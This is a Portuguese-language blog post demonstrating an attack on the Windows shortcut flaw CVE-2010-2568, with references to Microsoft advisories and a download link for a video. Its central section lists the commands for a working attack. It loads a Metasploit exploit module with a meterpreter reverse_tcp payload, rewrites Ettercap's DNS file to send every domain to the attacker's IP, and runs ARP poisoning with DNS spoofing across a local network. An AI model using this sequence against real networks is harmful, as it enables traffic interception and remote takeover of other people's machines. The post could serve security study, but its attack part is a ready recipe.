• homepost1

  • homepost4

  • homepost2

  • homepost5

  • homepost3

  • homepost6

  • homepost7

Vulnerabilidade de atalho do Windows - CVE-2010-2568 - Metasploit + Ettercap



Vulnerabilidade de atalho nos sistemas operacionais Windows das versões Windows XP SP2 e SP3, Server 2003 SP2, Vista SP1 e SP2, Server 2008 SP2 e R2, e Windows 7, que permite a execução de códigos maliciosos através dos arquivos de atalho fabiano.LNK ou fabiano.PIF que e direcionado para um DLL malicioso.
Maiores informações em:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx

O que eu fiz?
Usei o metasploit para preparar o ataque fazendo um servidor e o ettercap fazendo um MITM, e direcionando todo trafego da minha rede local para minha maquina.

Comandos:
use windows/browser/ms10_046_shortcut_icon_dllloader
set LHOST 192.168.1.4
set PAYLOAD windows/meterpreter/reverse_tcp
EditorDeTexto /usr/share/ettercap/etter.dns
*.* A SeuIP
ettercap -T -q -P dns_spoof -M ARP // //

Sobre o Vídeo:
Formato: AVI
Tamanho: 12.6 MB
Duração: 4:45 min
Autor: Fabiano Matias aka Bhior
Musica:  Cachimbo da paz - Gabriel o Pensador
Baixar: http://www.4shared.com/file/MzP5k2eD/Windows_LNK_CVE-2010-2568.html

Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568
http://www.osvdb.org/66387
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx
http://adrenaline.com.br/seguranca/noticias/5616/criminosos-exploram-icones-de-atalhos-para-espalhar-malware.html

Filed Under: , , ,

About the Author

My name is Dinh Quang Huy or known as alias NhamNgaHanh .I made this template in magazine style and named it Simplex Darkness .I hope it helpful to persons who want a solutions for a template in Blogspot.To download this template and see template install instruction ,go to Simplex Design blog.

1 comment

Trackback URL | Comments RSS Feed

  1. Bhior says:

    @tela,

    Sim,

    Para sua segunda pergunta, vou fazer a aula.

    Abraços

     

Leave a Reply